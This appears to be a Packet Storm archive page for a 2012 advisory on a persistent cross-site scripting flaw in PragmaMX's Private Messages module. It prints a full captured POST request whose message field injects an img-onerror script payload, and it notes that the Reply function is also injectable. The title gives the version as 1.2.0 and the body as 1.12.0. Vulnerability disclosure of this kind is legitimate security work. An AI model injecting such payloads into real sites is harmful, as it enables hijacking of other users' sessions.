what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PragmaMX 1.2.0 Persistent Cross Site Scripting

PragmaMX 1.2.0 Persistent Cross Site Scripting
Posted Jan 30, 2012
Authored by HauntIT

PragmaMX version 1.2.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 2acac9b9475fc75a7b022b1c9a2cbb62579325ae6f2cfe22066476045b410c91

PragmaMX 1.2.0 Persistent Cross Site Scripting

Change Mirror Download
# TITLE ... # Persistent XSS in PragmaMX 1.12.0 for logged in users    #
# DATE .... # 30.01.2012 .......................................... #
# AUTOHR .. # http://hauntit.blogspot.com ................ #
# SOFT LINK # http://www.pragmamx.org ............................. #
# VERSION . # 1.12.0 .............................................. #
# TESTED ON # LAMP ................................................ #
#...................................................................#
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
"pragmaMx - the fast CMS". :)
You should try it!
# 2. What is the type of vulnerability?
This is persistent cross-site scripting for authenticated users.
Vulnerability exists in "Private Messages".
Here I present You sample HTTP traffic (from BurpProxy).
...cut...
POST /pragmaMx_1.12.0/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Ubuntu; X11; Linux i686; rv:9.0.1) Gecko/20100101
Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer:
http://pragmaMx_1.12.0/html/modules.php?name=Private_Messages&op=send
Cookie: mxA9649D14D6AAF90E4A70576BF4ACC1=6db52d6de453f7a5890b36ebafd99fda;
tab_ya_edituser=0; PHPSESSID=d7nhrjbs5i2pmjvo6vuj1hg2j1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
name=Private_Messages&op=submit&to_user=adminek&subject=persistent+MSG&image=icon1.gif&message=hi%21%0D%0A%27%3E%3Cimg+src%3Dy+onerror%3Dalert%28%27i+am+watching+you%27%29%3B%3E&msg_id=0&submit=Submit
...cut...
It depends on what code You will add to $message.
Persistent XSS code could be added when You decide to reply, too.
So click 'Reply' button, and as a $message parameter add Your XSS-code.
# 3. Where is bug :)
$message parameter in source code. We need (more) validation here. :)
# 4. More...
- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
# Best regards
#

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close